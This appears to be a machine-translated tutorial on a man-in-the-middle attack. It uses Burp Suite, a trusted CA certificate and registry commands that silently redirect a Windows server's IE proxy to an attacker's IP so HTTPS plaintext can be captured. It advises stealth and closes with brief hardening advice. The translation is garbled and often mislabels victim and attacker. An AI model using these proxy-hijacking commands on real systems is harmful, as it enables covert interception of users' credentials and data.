Man-in-the-middle attack hijacking HTTPS plaintext data

The safe transmission of sensitive data is an important part of network security technology, most think that only HTTPS is the best practice, regardless of the price of SSL certificate, at least HTTPS is not absolutely secure, when the man-in-the-middle hijacking attack will also obtain the transmission of plaintext data, the specific attack principle see " HTTPS connection process and man-in-the-middle attack hijacking, but this article also says that using a man-in-the-middle attack means that the client must trust the middleman's certificate or the attack is invalid. So this attack mode is difficult and inconvenient to attack, but it is not to say that cannot be achieved. The individual believes that there are at least two ways to make use of:
?? One, after obtaining the Remote Desktop logon permission of the server, set the client to trust the middleman's certificate!
?? Second, use a physical attack, get to the attacker's computer, set the client to trust the man-in-the-middle certificate

1.1.1 Setting up the Client Trust middleman certificate

?? The middleman here, we use burpsuite, and then achieve this time an HTTPS hijacking attack. First we need the client (the attacker's computer) to trust the Burpsuite certificate, that is, to install the Burpsuite CA certificate, the configuration is described in the official configuration.

1.1.2 Attack conditions

?? By thinking we found that the current use of the existence of a certain limit, let's understand that the technology is not enough. The attack condition mainly has the following aspects:
?? First, the server needs to be a Windows host.
?? Second, the attacker needs to have a separate external network host (or the same LAN).
?? Third, have Remote Desktop control of the server, or temporarily have the attacker's computer.
?? For the third condition, a simple description of the Remote Desktop control of the server, does not have access to the application system of sensitive data or data in the database, for example, you in a site (only a landing page) detected a command execution vulnerability, you can execute commands, but the permissions are not very high (even if the permissions are high, Unless you are only interested in server control and not on sensitive data in your application, we can use this attack mode now!

Introduction to 1.1.3 Experimental environment

?? Operating system: Microsoft Windows Server R2 enterprise,ip:192.168.1.25
?? User Rights group: *users
?? Use tool: Burpsuite
?? Attacker ip:192.168.1.200

1.1.4 Configuring Attackers Burpsuite

?? Since we are going to get the packets transmitted by the attackers, and the attackers are often in the intranet, the extranet access is mostly mapped out, so we set up our Burpsuite proxy for any IP packets coming over, as shown in:

1.1.5 set the attacker's IE proxy

?? If you can enter the desktop environment, you can set up the IE proxy through a graphical interface, as shown in:

?? If you can't get to the remote Desktop, we can use the following command to set up IE Proxy:

//开启代理！    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f    //设置代理ip及端口，为攻击者的ip，端口与burpsuite设置保持一致！reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "192.168.1.200:8080" /f    //关闭设置的代理可以使用下面的命令：reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f

?? The above command has been tested as long as the users user group can execute successfully, as shown in order to make it easier for us to write open and closed commands as bat batch files respectively.

1.1.6 obtaining the plaintext data after hijacking

?? In order not to let the attacker suspect, we do not turn on the truncation function as shown in:

?? Now the attacker only needs to wait for the attacker to use the browser to access the relevant website, even the HTTPS site we can also hijack the plaintext data, as shown in:

1.1.7 Summary and Repair suggestions

?? In addition, if it is only HTTP Web site, the above attack difficulty and harm will greatly increase, because do not need to set up the client to trust the intermediary's certificate this link, only need to set the agent of the client, and this one can use the method of fishing to open the agent function to spread the tool can be, Or just a simple command to execute the shell, normal permissions can! The recommended fixes are as follows:
?? First, the server security hardening, to prevent the use of server vulnerabilities to attack!
?? Second, set the browser do not use the default system agent, IE global Agent!
?? Third, to enhance the safety awareness, when leaving the computer to remember to set the password lock screen, borrow the computer for others to use when possible in the side, the use of the completion of check if there is an abnormality!

Man-in-the-middle attack hijacking HTTPS plaintext data